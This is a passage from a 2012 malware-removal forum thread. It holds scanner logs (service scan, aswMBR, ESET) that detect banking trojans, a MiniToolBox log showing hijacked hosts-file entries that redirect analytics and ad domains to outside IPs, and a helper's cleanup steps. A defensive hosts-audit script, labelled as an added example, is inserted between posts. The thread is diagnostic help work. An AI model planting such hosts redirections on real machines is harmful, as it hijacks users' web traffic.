14:30:02.0795 1144 s3cap (e60c0a09f997826c7627b244195ab581) C:\Windows\system32\drivers\vms3cap.sys
14:30:02.0795 1144 s3cap - ok
14:30:02.0820 1144 SamSs (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:30:02.0821 1144 SamSs - ok
14:30:02.0881 1144 SANDRA (5efbbfcc6adac121c8e2fe76641ed329) C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011.SP3\WNt500x64\Sandra.sys
14:30:02.0881 1144 SANDRA - ok
14:30:02.0925 1144 SandraAgentSrv (df7d83053f32dd52b7cc079eb3342c24) C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011.SP3\RpcAgentSrv.exe
14:30:02.0925 1144 SandraAgentSrv - ok
14:30:02.0979 1144 sbp2port (ac03af3329579fffb455aa2daabbe22b) C:\Windows\system32\drivers\sbp2port.sys
14:30:02.0979 1144 sbp2port - ok
14:30:03.0006 1144 SCardSvr (9b7395789e3791a3b6d000fe6f8b131e) C:\Windows\System32\SCardSvr.dll
14:30:03.0007 1144 SCardSvr - ok
14:30:03.0019 1144 scfilter (253f38d0d7074c02ff8deb9836c97d2b) C:\Windows\system32\DRIVERS\scfilter.sys
14:30:03.0020 1144 scfilter - ok
14:30:03.0052 1144 Schedule (262f6592c3299c005fd6bec90fc4463a) C:\Windows\system32\schedsvc.dll
14:30:03.0056 1144 Schedule - ok
14:30:03.0074 1144 SCPolicySvc (f17d1d393bbc69c5322fbfafaca28c7f) C:\Windows\System32\certprop.dll
14:30:03.0075 1144 SCPolicySvc - ok
14:30:03.0098 1144 SDRSVC (6ea4234dc55346e0709560fe7c2c1972) C:\Windows\System32\SDRSVC.dll
14:30:03.0099 1144 SDRSVC - ok
14:30:03.0135 1144 secdrv (3ea8a16169c26afbeb544e0e48421186) C:\Windows\system32\drivers\secdrv.sys
14:30:03.0136 1144 secdrv - ok
14:30:03.0172 1144 seclogon (bc617a4e1b4fa8df523a061739a0bd87) C:\Windows\system32\seclogon.dll
14:30:03.0172 1144 seclogon - ok
14:30:03.0198 1144 SENS (c32ab8fa018ef34c0f113bd501436d21) C:\Windows\System32\sens.dll
14:30:03.0199 1144 SENS - ok
14:30:03.0227 1144 SensrSvc (0336cffafaab87a11541f1cf1594b2b2) C:\Windows\system32\sensrsvc.dll
14:30:03.0227 1144 SensrSvc - ok
14:30:03.0249 1144 Serenum (cb624c0035412af0debec78c41f5ca1b) C:\Windows\system32\drivers\serenum.sys
14:30:03.0250 1144 Serenum - ok
14:30:03.0274 1144 Serial (c1d8e28b2c2adfaec4ba89e9fda69bd6) C:\Windows\system32\drivers\serial.sys
14:30:03.0275 1144 Serial - ok
14:30:03.0294 1144 sermouse (1c545a7d0691cc4a027396535691c3e3) C:\Windows\system32\drivers\sermouse.sys
14:30:03.0294 1144 sermouse - ok
14:30:03.0309 1144 SessionEnv (0b6231bf38174a1628c4ac812cc75804) C:\Windows\system32\sessenv.dll
14:30:03.0309 1144 SessionEnv - ok
14:30:03.0319 1144 sffdisk (a554811bcd09279536440c964ae35bbf) C:\Windows\system32\drivers\sffdisk.sys
14:30:03.0319 1144 sffdisk - ok
14:30:03.0326 1144 sffp_mmc (ff414f0baefeba59bc6c04b3db0b87bf) C:\Windows\system32\drivers\sffp_mmc.sys
14:30:03.0326 1144 sffp_mmc - ok
14:30:03.0332 1144 sffp_sd (dd85b78243a19b59f0637dcf284da63c) C:\Windows\system32\drivers\sffp_sd.sys
14:30:03.0332 1144 sffp_sd - ok
14:30:03.0339 1144 sfloppy (a9d601643a1647211a1ee2ec4e433ff4) C:\Windows\system32\drivers\sfloppy.sys
14:30:03.0339 1144 sfloppy - ok
14:30:03.0372 1144 SharedAccess (b95f6501a2f8b2e78c697fec401970ce) C:\Windows\System32\ipnathlp.dll
14:30:03.0374 1144 SharedAccess - ok
14:30:03.0404 1144 ShellHWDetection (aaf932b4011d14052955d4b212a4da8d) C:\Windows\System32\shsvcs.dll
14:30:03.0405 1144 ShellHWDetection - ok
14:30:03.0427 1144 SiSRaid2 (843caf1e5fde1ffd5ff768f23a51e2e1) C:\Windows\system32\drivers\SiSRaid2.sys
14:30:03.0427 1144 SiSRaid2 - ok
14:30:03.0461 1144 SiSRaid4 (6a6c106d42e9ffff8b9fcb4f754f6da4) C:\Windows\system32\drivers\sisraid4.sys
14:30:03.0461 1144 SiSRaid4 - ok
14:30:03.0498 1144 Smb (548260a7b8654e024dc30bf8a7c5baa4) C:\Windows\system32\DRIVERS\smb.sys
14:30:03.0498 1144 Smb - ok
14:30:03.0537 1144 SNMPTRAP (6313f223e817cc09aa41811daa7f541d) C:\Windows\System32\snmptrap.exe
14:30:03.0537 1144 SNMPTRAP - ok
14:30:03.0571 1144 spldr (b9e31e5cacdfe584f34f730a677803f9) C:\Windows\system32\drivers\spldr.sys
14:30:03.0571 1144 spldr - ok
14:30:03.0604 1144 Spooler (b96c17b5dc1424d56eea3a99e97428cd) C:\Windows\System32\spoolsv.exe
14:30:03.0606 1144 Spooler - ok
14:30:03.0667 1144 sppsvc (e17e0188bb90fae42d83e98707efa59c) C:\Windows\system32\sppsvc.exe
14:30:03.0678 1144 sppsvc - ok
14:30:03.0701 1144 sppuinotify (93d7d61317f3d4bc4f4e9f8a96a7de45) C:\Windows\system32\sppuinotify.dll
14:30:03.0702 1144 sppuinotify - ok
14:30:03.0796 1144 SpyHunter 4 Service (45a20a8416ee7dc7711953cc68b07643) C:\PROGRA~1\ENIGMA~1\SPYHUN~1\SH4SER~1.EXE
14:30:03.0800 1144 SpyHunter 4 Service - ok
14:30:03.0844 1144 srv (441fba48bff01fdb9d5969ebc1838f0b) C:\Windows\system32\DRIVERS\srv.sys
14:30:03.0845 1144 srv - ok
14:30:03.0863 1144 srv2 (b4adebbf5e3677cce9651e0f01f7cc28) C:\Windows\system32\DRIVERS\srv2.sys
14:30:03.0865 1144 srv2 - ok
14:30:03.0872 1144 srvnet (27e461f0be5bff5fc737328f749538c3) C:\Windows\system32\DRIVERS\srvnet.sys
14:30:03.0872 1144 srvnet - ok
14:30:03.0908 1144 SSDPSRV (51b52fbd583cde8aa9ba62b8b4298f33) C:\Windows\System32\ssdpsrv.dll
14:30:03.0910 1144 SSDPSRV - ok
14:30:03.0925 1144 SstpSvc (ab7aebf58dad8daab7a6c45e6a8885cb) C:\Windows\system32\sstpsvc.dll
14:30:03.0926 1144 SstpSvc - ok
14:30:03.0973 1144 Stereo Service (6086b60f2e36d06a063cb07ed0524332) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
14:30:03.0974 1144 Stereo Service - ok
14:30:04.0004 1144 stexstor (f3817967ed533d08327dc73bc4d5542a) C:\Windows\system32\drivers\stexstor.sys
14:30:04.0005 1144 stexstor - ok
14:30:04.0032 1144 stisvc (8dd52e8e6128f4b2da92ce27402871c1) C:\Windows\System32\wiaservc.dll
14:30:04.0034 1144 stisvc - ok
14:30:04.0055 1144 storflt (7785dc213270d2fc066538daf94087e7) C:\Windows\system32\drivers\vmstorfl.sys
14:30:04.0055 1144 storflt - ok
14:30:04.0072 1144 StorSvc (c40841817ef57d491f22eb103da587cc) C:\Windows\system32\storsvc.dll
14:30:04.0073 1144 StorSvc - ok
14:30:04.0088 1144 storvsc (d34e4943d5ac096c8edeebfd80d76e23) C:\Windows\system32\drivers\storvsc.sys
14:30:04.0089 1144 storvsc - ok
14:30:04.0111 1144 swenum (d01ec09b6711a5f8e7e6564a4d0fbc90) C:\Windows\system32\DRIVERS\swenum.sys
14:30:04.0112 1144 swenum - ok
14:30:04.0197 1144 SwitchBoard (f577910a133a592234ebaad3f3afa258) C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
14:30:04.0198 1144 SwitchBoard - ok
14:30:04.0246 1144 swprv (e08e46fdd841b7184194011ca1955a0b) C:\Windows\System32\swprv.dll
14:30:04.0249 1144 swprv - ok
14:30:04.0295 1144 SysMain (bf9ccc0bf39b418c8d0ae8b05cf95b7d) C:\Windows\system32\sysmain.dll
14:30:04.0301 1144 SysMain - ok
14:30:04.0329 1144 TabletInputService (e3c61fd7b7c2557e1f1b0b4cec713585) C:\Windows\System32\TabSvc.dll
14:30:04.0330 1144 TabletInputService - ok
14:30:04.0362 1144 tap0901 (6e8732acfd4c8d1ec4a4e872168b8b92) C:\Windows\system32\DRIVERS\tap0901.sys
14:30:04.0362 1144 tap0901 - ok
14:30:04.0384 1144 TapiSrv (40f0849f65d13ee87b9a9ae3c1dd6823) C:\Windows\System32\tapisrv.dll
14:30:04.0386 1144 TapiSrv - ok
14:30:04.0418 1144 tapoas (927d0cdb3f96efc1e98fb1a2c9fb67ad) C:\Windows\system32\DRIVERS\tapoas.sys
14:30:04.0418 1144 tapoas - ok
14:30:04.0434 1144 TBS (1be03ac720f4d302ea01d40f588162f6) C:\Windows\System32\tbssvc.dll
14:30:04.0435 1144 TBS - ok
14:30:04.0486 1144 Tcpip (f0e98c00a09fdf791525829a1d14240f) C:\Windows\system32\drivers\tcpip.sys
14:30:04.0492 1144 Tcpip - ok
14:30:04.0543 1144 TCPIP6 (f0e98c00a09fdf791525829a1d14240f) C:\Windows\system32\DRIVERS\tcpip.sys
14:30:04.0549 1144 TCPIP6 - ok
14:30:04.0568 1144 tcpipreg (df687e3d8836bfb04fcc0615bf15a519) C:\Windows\system32\drivers\tcpipreg.sys
14:30:04.0569 1144 tcpipreg - ok
14:30:04.0595 1144 TDPIPE (3371d21011695b16333a3934340c4e7c) C:\Windows\system32\drivers\tdpipe.sys
14:30:04.0596 1144 TDPIPE - ok
14:30:04.0610 1144 TDTCP (e4245bda3190a582d55ed09e137401a9) C:\Windows\system32\drivers\tdtcp.sys
14:30:04.0610 1144 TDTCP - ok
14:30:04.0617 1144 tdx (ddad5a7ab24d8b65f8d724f5c20fd806) C:\Windows\system32\DRIVERS\tdx.sys
14:30:04.0618 1144 tdx - ok
14:30:04.0624 1144 TermDD (561e7e1f06895d78de991e01dd0fb6e5) C:\Windows\system32\DRIVERS\termdd.sys
14:30:04.0624 1144 TermDD - ok
14:30:04.0646 1144 TermService (2e648163254233755035b46dd7b89123) C:\Windows\System32\termsrv.dll
14:30:04.0648 1144 TermService - ok
14:30:04.0668 1144 Themes (f0344071948d1a1fa732231785a0664c) C:\Windows\system32\themeservice.dll
14:30:04.0668 1144 Themes - ok
14:30:04.0691 1144 THREADORDER (e40e80d0304a73e8d269f7141d77250b) C:\Windows\system32\mmcss.dll
14:30:04.0692 1144 THREADORDER - ok
14:30:04.0714 1144 TrkWks (7e7afd841694f6ac397e99d75cead49d) C:\Windows\System32\trkwks.dll
14:30:04.0715 1144 TrkWks - ok
14:30:04.0737 1144 TrustedInstaller (773212b2aaa24c1e31f10246b15b276c) C:\Windows\servicing\TrustedInstaller.exe
14:30:04.0738 1144 TrustedInstaller - ok
14:30:04.0771 1144 tssecsrv (ce18b2cdfc837c99e5fae9ca6cba5d30) C:\Windows\system32\DRIVERS\tssecsrv.sys
14:30:04.0771 1144 tssecsrv - ok
14:30:04.0799 1144 TsUsbFlt (d11c783e3ef9a3c52c0ebe83cc5000e9) C:\Windows\system32\drivers\tsusbflt.sys
14:30:04.0799 1144 TsUsbFlt - ok
14:30:04.0809 1144 TsUsbGD (9cc2ccae8a84820eaecb886d477cbcb8) C:\Windows\system32\drivers\TsUsbGD.sys
14:30:04.0810 1144 TsUsbGD - ok
14:30:04.0834 1144 tunnel (3566a8daafa27af944f5d705eaa64894) C:\Windows\system32\DRIVERS\tunnel.sys
14:30:04.0835 1144 tunnel - ok
14:30:04.0868 1144 uagp35 (b4dd609bd7e282bfc683cec7eaaaad67) C:\Windows\system32\drivers\uagp35.sys
14:30:04.0868 1144 uagp35 - ok
14:30:04.0877 1144 udfs (ff4232a1a64012baa1fd97c7b67df593) C:\Windows\system32\DRIVERS\udfs.sys
14:30:04.0878 1144 udfs - ok
14:30:04.0895 1144 UI0Detect (3cbdec8d06b9968aba702eba076364a1) C:\Windows\system32\UI0Detect.exe
14:30:04.0896 1144 UI0Detect - ok
14:30:04.0928 1144 UimBus (4bf243bf18de55c08a021dd37f54a097) C:\Windows\system32\DRIVERS\uimx64.sys
14:30:04.0929 1144 UimBus - ok
14:30:04.0944 1144 Uim_IM (743affe7920184238d37f4307198313b) C:\Windows\system32\Drivers\Uim_IMx64.sys
14:30:04.0946 1144 Uim_IM - ok
14:30:04.0966 1144 uliagpkx (4bfe1bc28391222894cbf1e7d0e42320) C:\Windows\system32\drivers\uliagpkx.sys
14:30:04.0967 1144 uliagpkx - ok
14:30:04.0995 1144 umbus (dc54a574663a895c8763af0fa1ff7561) C:\Windows\system32\DRIVERS\umbus.sys
14:30:04.0995 1144 umbus - ok
14:30:05.0026 1144 UmPass (b2e8e8cb557b156da5493bbddcc1474d) C:\Windows\system32\drivers\umpass.sys
14:30:05.0026 1144 UmPass - ok
14:30:05.0042 1144 UmRdpService (a293dcd756d04d8492a750d03b9a297c) C:\Windows\System32\umrdp.dll
14:30:05.0043 1144 UmRdpService - ok
14:30:05.0071 1144 upnphost (d47ec6a8e81633dd18d2436b19baf6de) C:\Windows\System32\upnphost.dll
14:30:05.0072 1144 upnphost - ok
14:30:05.0106 1144 USBAAPL64 (fb251567f41bc61988b26731dec19e4b) C:\Windows\system32\Drivers\usbaapl64.sys
14:30:05.0106 1144 USBAAPL64 - ok
14:30:05.0171 1144 usbccgp (481dff26b4dca8f4cbac1f7dce1d6829) C:\Windows\system32\DRIVERS\usbccgp.sys
14:30:05.0171 1144 usbccgp - ok
14:30:05.0188 1144 usbcir (af0892a803fdda7492f595368e3b68e7) C:\Windows\system32\drivers\usbcir.sys
14:30:05.0189 1144 usbcir - ok
14:30:05.0226 1144 usbehci (c025055fe7b87701eb042095df1a2d7b) C:\Windows\system32\drivers\usbehci.sys
14:30:05.0227 1144 usbehci - ok
14:30:05.0297 1144 usbhub (287c6c9410b111b68b52ca298f7b8c24) C:\Windows\system32\DRIVERS\usbhub.sys
14:30:05.0298 1144 usbhub - ok
14:30:05.0330 1144 usbohci (9840fc418b4cbd632d3d0a667a725c31) C:\Windows\system32\drivers\usbohci.sys
14:30:05.0330 1144 usbohci - ok
14:30:05.0352 1144 usbprint (73188f58fb384e75c4063d29413cee3d) C:\Windows\system32\drivers\usbprint.sys
14:30:05.0352 1144 usbprint - ok
14:30:05.0369 1144 usbscan (aaa2513c8aed8b54b189fd0c6b1634c0) C:\Windows\system32\DRIVERS\usbscan.sys
14:30:05.0369 1144 usbscan - ok
14:30:05.0391 1144 USBSTOR (fed648b01349a3c8395a5169db5fb7d6) C:\Windows\system32\DRIVERS\USBSTOR.SYS
14:30:05.0391 1144 USBSTOR - ok
14:30:05.0425 1144 usbuhci (62069a34518bcf9c1fd9e74b3f6db7cd) C:\Windows\system32\drivers\usbuhci.sys
14:30:05.0426 1144 usbuhci - ok
14:30:05.0450 1144 UxSms (edbb23cbcf2cdf727d64ff9b51a6070e) C:\Windows\System32\uxsms.dll
14:30:05.0451 1144 UxSms - ok
14:30:05.0492 1144 VaultSvc (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:30:05.0493 1144 VaultSvc - ok
14:30:05.0535 1144 VClone (fd911873c0bb6945fa38c16e9a2b58f9) C:\Windows\system32\DRIVERS\VClone.sys
14:30:05.0535 1144 VClone - ok
14:30:05.0556 1144 vdrvroot (c5c876ccfc083ff3b128f933823e87bd) C:\Windows\system32\drivers\vdrvroot.sys
14:30:05.0556 1144 vdrvroot - ok
14:30:05.0576 1144 vds (8d6b481601d01a456e75c3210f1830be) C:\Windows\System32\vds.exe
14:30:05.0579 1144 vds - ok
14:30:05.0592 1144 vga (da4da3f5e02943c2dc8c6ed875de68dd) C:\Windows\system32\DRIVERS\vgapnp.sys
14:30:05.0592 1144 vga - ok
14:30:05.0601 1144 VgaSave (53e92a310193cb3c03bea963de7d9cfc) C:\Windows\System32\drivers\vga.sys
14:30:05.0601 1144 VgaSave - ok
14:30:05.0618 1144 vhdmp (2ce2df28c83aeaf30084e1b1eb253cbb) C:\Windows\system32\drivers\vhdmp.sys
14:30:05.0619 1144 vhdmp - ok
14:30:05.0652 1144 viaide (e5689d93ffe4e5d66c0178761240dd54) C:\Windows\system32\drivers\viaide.sys
14:30:05.0652 1144 viaide - ok
14:30:05.0669 1144 vmbus (86ea3e79ae350fea5331a1303054005f) C:\Windows\system32\drivers\vmbus.sys
14:30:07.0360 1144 ============================================================
14:30:07.0360 1144 Scan finished
14:30:07.0360 1144 ============================================================
14:30:07.0364 6204 Detected object count: 0
14:30:07.0364 6204 Actual detected object count: 0


#######################################################################

aswMBR:

aswMBR version 0.9.9.1665 Copyright© 2011 AVAST Software
Run date: 2012-04-16 14:31:30
-----------------------------
14:31:30.729 OS Version: Windows x64 6.1.7601 Service Pack 1
14:31:30.729 Number of processors: 8 586 0x2A07
14:31:30.729 ComputerName: OWNER-PC110658 UserName: Owner
14:31:36.901 Initialize success
14:32:17.146 AVAST engine defs: 12041600
14:32:21.730 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1
14:32:21.731 Disk 0 Vendor: ST350041 JC45 Size: 476940MB BusType: 8
14:32:21.732 Disk 1 \Device\Harddisk1\DR1 -> \Device\Ide\IAAStorageDevice-2
14:32:21.733 Disk 1 Vendor: ST310005 JC45 Size: 953869MB BusType: 8
14:32:21.742 Disk 0 MBR read successfully
14:32:21.744 Disk 0 MBR scan
14:32:21.746 Disk 0 Windows 7 default MBR code
14:32:21.749 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 463507 MB offset 2048
14:32:21.772 Disk 0 Partition 2 00 BC BCFS 13431 MB offset 949264785
14:32:21.809 Disk 0 scanning C:\Windows\system32\drivers
14:32:30.053 Service scanning
14:32:44.960 Modules scanning
14:32:44.964 Disk 0 trace - called modules:
14:32:44.979 ntoskrnl.exe CLASSPNP.SYS disk.sys iaStor.sys hal.dll
14:32:44.981 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa80090c5790]
14:32:44.983 3 CLASSPNP.SYS[fffff88001a5143f] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-1[0xfffffa8007242050]
14:32:47.852 AVAST engine scan C:\Windows
14:32:49.593 AVAST engine scan C:\Windows\system32
14:34:03.573 AVAST engine scan C:\Windows\system32\drivers
14:34:14.650 AVAST engine scan C:\Users\Owner
14:36:11.011 File: C:\Users\Owner\AppData\Roaming\BAcroIEHelpe.dll **INFECTED** Win32:Agent-AOHP [Trj]
14:39:36.099 AVAST engine scan C:\ProgramData
14:40:37.265 Scan finished successfully
14:41:15.909 Disk 0 MBR has been saved successfully to "C:\Users\Owner\Desktop\MBR.dat"
14:41:15.911 The log file has been saved successfully to "C:\Users\Owner\Desktop\aswMBR.txt"

#6 narenxp

Posted 16 April 2012 - 08:45 PM

Download

http://www.techspot.com/downloads/4716-malwarebytes-anti-malware.html

Install, update and run a full scan

Click on SHOW results. Select all infections and remove them

Reboot the PC and scan MBAM once in regular mode until you get a clean log

Download

ESET online scanner


Install it

Click on START, it should download the virus definitions
When the scan gets completed, click on LIST of found threats

Export the list to desktop, copy the contents of the text file in your reply


Download

mini toolbox

Checkmark the following boxes:

Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Users, Partitions and Memory size

Click Go and post the result.

#7 mattsbach

Posted 16 April 2012 - 10:30 PM

MBAM was clean so I moved on to...

ESET:

C:\Users\Owner\AppData\Roaming\BAcroIEHelpe.dll Win32/Spy.Banker.XOR trojan cleaned by deleting - quarantined
C:\Users\Owner\AppData\Roaming\11003\components\AcroFF.dll Win32/Spy.Banker.XOS trojan cleaned by deleting (after the next restart) - quarantined

######################

And MiniToolbox:


MiniToolBox by Farbar Version: 18-01-2012
Ran by Owner (administrator) on 16-04-2012 at 23:28:44
Microsoft Windows 7 Professional Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================


"Reset FF Proxy Settings": Firefox Proxy settings were reset.

========================= Hosts content: =================================

#8 narenxp

Posted 16 April 2012 - 10:33 PM

Try to post the MiniToolBox log again

I know that your hosts file has been hijacked, but you should be able to post the complete log here

Good luck
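
The hosts-file hijack mentioned in this thread, turned into an audit check (an added example, not part of the original posts and not MiniToolBox's own logic): it reports hostnames mapped to non-loopback addresses, names written with a trailing dot, one name mapped to several addresses, and long runs of blank lines. The sample file is constructed, with documentation-range addresses, and the 20-line padding threshold is an assumption.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: blank-line padding, then tracker hostnames (written with
# a trailing dot) mapped to non-loopback addresses. The addresses are from the
# documentation ranges, not real indicators.
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\n"
    + "\n" * 200
    + "203.0.113.10 www.google-analytics.com.\n"
    + "203.0.113.10 www.statcounter.com.\n"
    + "198.51.100.20 www.google-analytics.com.\n"
    + "198.51.100.20 www.statcounter.com.\n"
    + "\n"
    + "127.0.0.1 localhost\n"
    + "0.0.0.0 ads.example.test  # blocklist-style sink, not a redirect\n"
)


def parse_hosts(text):
    """Yield (line_no, address, hostnames) for every mapping line."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # not an address, so not a usable hosts entry
        yield line_no, addr, fields[1:]


def longest_blank_run(text):
    """Length of the longest run of consecutive empty lines."""
    longest = current = 0
    for raw in text.splitlines():
        if raw.strip():
            current = 0
        else:
            current += 1
            longest = max(longest, current)
    return longest


def audit_hosts(text, padding_threshold=20):
    """Return findings for a hosts file given as text.

    padding_threshold is an assumed cut-off: a run of at least that many
    blank lines can push entries out of view in an editor.
    """
    run = longest_blank_run(text)
    redirects = []
    trailing_dot = set()
    by_host = defaultdict(set)
    for line_no, addr, names in parse_hosts(text):
        # Loopback and 0.0.0.0 entries are localhost or blocklist sinks.
        if addr.is_loopback or addr.is_unspecified:
            continue
        for name in names:
            host = name.rstrip(".").lower()
            redirects.append((line_no, host, str(addr)))
            by_host[host].add(str(addr))
            if name.endswith("."):
                trailing_dot.add(host)
    return {
        "blank_padding": run if run >= padding_threshold else 0,
        "redirects": redirects,
        "trailing_dot": sorted(trailing_dot),
        "multi_address": {h: sorted(a) for h, a in by_host.items() if len(a) > 1},
    }


if __name__ == "__main__":
    # On Windows the live file is %SystemRoot%\System32\drivers\etc\hosts;
    # here the constructed sample is audited instead.
    report = audit_hosts(SAMPLE_HOSTS)
    print("blank-line padding:", report["blank_padding"])
    for line_no, host, addr in report["redirects"]:
        print(f"line {line_no}: {host} -> {addr}")
    print("trailing-dot names:", report["trailing_dot"])
    print("names with several addresses:", report["multi_address"])
```

Any name in `redirects` that is not an intentional intranet mapping deserves a look before the file is reset.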

#9 mattsbach

Posted 16 April 2012 - 10:41 PM

Aha - forgot to scroll down. And now I see the bogus entries in my hosts file too. Okay, didn't touch anything yet, here's the full toolbox result:



MiniToolBox by Farbar Version: 18-01-2012
Ran by Owner (administrator) on 16-04-2012 at 23:38:12
Microsoft Windows 7 Professional Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================


"Reset FF Proxy Settings": Firefox Proxy settings were reset.

========================= Hosts content: =================================

149.5.18.172 www.google-analytics.com.
149.5.18.172 ad-emea.doubleclick.net.
149.5.18.172 www.statcounter.com.
108.163.215.51 www.google-analytics.com.
108.163.215.51 ad-emea.doubleclick.net.
108.163.215.51 www.statcounter.com.

127.0.0.1 localhost

========================= IP Configuration: ================================

Intel® 82579V Gigabit Network Connection = Local Area Connection (Connected)
802.11bgn 1T1R Wireless Adapter = Wireless Network Connection (Hardware not present)
TAP-Win32 Adapter V9 = office (Media disconnected)
TAP-Win32 Adapter V9 = datacenter (Media disconnected)


# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4

reset
set global icmpredirects=enabled


popd
# End of IPv4 configuration



Windows IP Configuration

Host Name . . . . . . . . . . . . : Owner-PC110658
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : home

Ethernet adapter datacenter:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Win32 Adapter V9 #2
Physical Address. . . . . . . . . : 00-FF-45-B1-EB-02
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Ethernet adapter office:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Win32 Adapter V9
Physical Address. . . . . . . . . : 00-FF-41-2A-E7-35
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : home
Description . . . . . . . . . . . : Intel® 82579V Gigabit Network Connection
Physical Address. . . . . . . . . : 00-22-4D-4F-DC-F7
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::3040:4969:6b63:1f2a%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.1.8(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Monday, April 16, 2012 3:49:12 PM
Lease Expires . . . . . . . . . . : Tuesday, April 17, 2012 3:49:12 PM
Default Gateway . . . . . . . . . : 192.168.1.1
DHCP Server . . . . . . . . . . . : 192.168.1.1
DHCPv6 IAID . . . . . . . . . . . : 234889805
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-15-9D-04-93-00-22-4D-4F-DC-F7
DNS Servers . . . . . . . . . . . : 192.168.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{412AE735-DC18-481E-A693-7866D7D644DB}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Teredo Tunneling Pseudo-Interface:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:0:5ef5:79fb:300b:28b9:93e3:5a5d(Preferred)
Link-local IPv6 Address . . . . . : fe80::300b:28b9:93e3:5a5d%13(Preferred)
Default Gateway . . . . . . . . . : ::
NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter isatap.{45B1EB02-5E3A-4784-9FF4-A1D7385E7208}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.home:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : home
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Server: Wireless_Broadband_Router.home
Address: 192.168.1.1

Name: google.com
Addresses: 72.14.204.102
72.14.204.101
72.14.204.138
72.14.204.100
72.14.204.113


Pinging google.com [74.125.228.14] with 32 bytes of data:
Reply from 74.125.228.14: bytes=32 time=8ms TTL=252
Reply from 74.125.228.14: bytes=32 time=8ms TTL=252

Ping statistics for 74.125.228.14:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 8ms, Maximum = 8ms, Average = 8ms
Server: Wireless_Broadband_Router.home
Address: 192.168.1.1

Name: yahoo.com
Addresses: 72.30.38.140
98.139.183.24
209.191.122.70


Pinging yahoo.com [72.30.38.140] with 32 bytes of data:
Reply from 72.30.38.140: bytes=32 time=166ms TTL=250
Reply from 72.30.38.140: bytes=32 time=103ms TTL=250

Ping statistics for 72.30.38.140:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 103ms, Maximum = 166ms, Average = 134ms
Server: Wireless_Broadband_Router.home
Address: 192.168.1.1

Name: bleepingcomputer.com
Address: 208.43.87.2


Pinging bleepingcomputer.com [208.43.87.2] with 32 bytes of data:
Reply from 208.43.87.2: Destination host unreachable.
Reply from 208.43.87.2: Destination host unreachable.

Ping statistics for 208.43.87.2:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),

Pinging 127.0.0.1 with 32 bytes of data:
